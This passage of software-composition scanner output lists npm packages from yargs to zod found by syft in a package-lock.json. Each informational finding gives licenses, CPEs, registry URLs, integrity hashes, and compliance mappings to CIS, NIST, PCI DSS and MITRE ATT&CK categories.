"ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: y18n 4.0.3", "title": "y18n 4.0.3", "description": "Package discovered: y18n 4.0.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f92fb588898c98cc", "name": "y18n", "version": "4.0.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:y18n_project:y18n:4.0.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/y18n@4.0.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/y18n/-/y18n-4.0.3.tgz", "integrity": "sha512-JKhqTOwSrqNA1NY5lSztJ1GrBiUodLMmIZuLiDaMRJ+itFd+ABVE8XBjOvIWL+rSqNDC74LCSFmlb/U4UZ4hJQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ff7837262c7a0506", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: y18n 5.0.8", "title": "y18n 5.0.8", "description": "Package discovered: y18n 5.0.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "17090a29739955b3", "name": "y18n", "version": "5.0.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:y18n_project:y18n:5.0.8:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/y18n@5.0.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "20985a40c61069a1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: yallist 4.0.0", "title": "yallist 4.0.0", "description": "Package discovered: yallist 4.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c85ae4ebdc6284ae", "name": "yallist", "version": "4.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:yallist:yallist:4.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/yallist@4.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "71c51c3c7b12c140", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: yargs 15.4.1", "title": "yargs 15.4.1", "description": "Package discovered: yargs 15.4.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bbb181fdab2eb6da", "name": "yargs", "version": "15.4.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:yargs:yargs:15.4.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/yargs@15.4.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/yargs/-/yargs-15.4.1.tgz", "integrity": "sha512-aePbxDmcYW++PaqBsJ+HYUFwCdv4LVvdnhBy78E57PIor8/OVvhMrADFFEDh8DHDFRv/O9i3lPhsENjO7QX0+A==", "dependencies": { "cliui": "^6.0.0", "decamelize": "^1.2.0", "find-up": "^4.1.0", "get-caller-file": "^2.0.1", "require-directory": "^2.1.1", "require-main-filename": "^2.0.0", "set-blocking": "^2.0.0", "string-width": "^4.2.0", "which-module": "^2.0.0", "y18n": "^4.0.0", "yargs-parser": "^18.1.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "96fe97c2b6d8795a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: yargs 17.7.2", "title": "yargs 17.7.2", "description": "Package discovered: yargs 17.7.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c2726c8cb18290f2", "name": "yargs", "version": "17.7.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:yargs:yargs:17.7.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/yargs@17.7.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", "dependencies": { "cliui": "^8.0.1", "escalade": "^3.1.1", "get-caller-file": "^2.0.5", "require-directory": "^2.1.1", "string-width": "^4.2.3", "y18n": "^5.0.5", "yargs-parser": "^21.1.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ee09b685d8bedc8a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: yargs-parser 18.1.3", "title": "yargs-parser 18.1.3", "description": "Package discovered: yargs-parser 18.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "385fd2e9c795bcc7", "name": "yargs-parser", "version": "18.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:yargs:yargs-parser:18.1.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/yargs-parser@18.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-18.1.3.tgz", "integrity": "sha512-o50j0JeToy/4K6OZcaQmW6lyXXKhq7csREXcDwk2omFPJEwUNOVtJKvmDr9EI1fAJZUyZcRF7kxGBWmRXudrCQ==", "dependencies": { "camelcase": "^5.0.0", "decamelize": "^1.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a4ff6cebec5b0be4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: yargs-parser 21.1.1", "title": "yargs-parser 21.1.1", "description": "Package discovered: yargs-parser 21.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "95c25d265eed6eaf", "name": "yargs-parser", "version": "21.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:yargs:yargs-parser:21.1.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/yargs-parser@21.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "14bd34194369a5c5", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: yocto-queue 0.1.0", "title": "yocto-queue 0.1.0", "description": "Package discovered: yocto-queue 0.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "813268dedfe3539f", "name": "yocto-queue", "version": "0.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:yocto-queue:yocto-queue:0.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yocto-queue:yocto_queue:0.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yocto_queue:yocto-queue:0.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yocto_queue:yocto_queue:0.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yocto:yocto-queue:0.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yocto:yocto_queue:0.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/yocto-queue@0.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "16bb4d5a9e7dc8d3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: yoga-layout 2.0.1", "title": "yoga-layout 2.0.1", "description": "Package discovered: yoga-layout 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "579e04e050802ec1", "name": "yoga-layout", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:yoga-layout:yoga-layout:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yoga-layout:yoga_layout:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yoga_layout:yoga-layout:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yoga_layout:yoga_layout:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yoga:yoga-layout:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:yoga:yoga_layout:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/yoga-layout@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/yoga-layout/-/yoga-layout-2.0.1.tgz", "integrity": "sha512-tT/oChyDXelLo2A+UVnlW9GU7CsvFMaEnd9kVFsaiCQonFAXd3xrHhkLYu+suwwosrAEQ746xBU+HvYtm1Zs2Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6ac3ad6fac7a8b51", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: zod 3.25.76", "title": "zod 3.25.76", "description": "Package discovered: zod 3.25.76", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c30d59c73bdda635", "name": "zod", "version": "3.25.76", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:zod:zod:3.25.76:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/zod@3.25.76", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/zod/-/zod-3.25.76.tgz", "integrity": "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 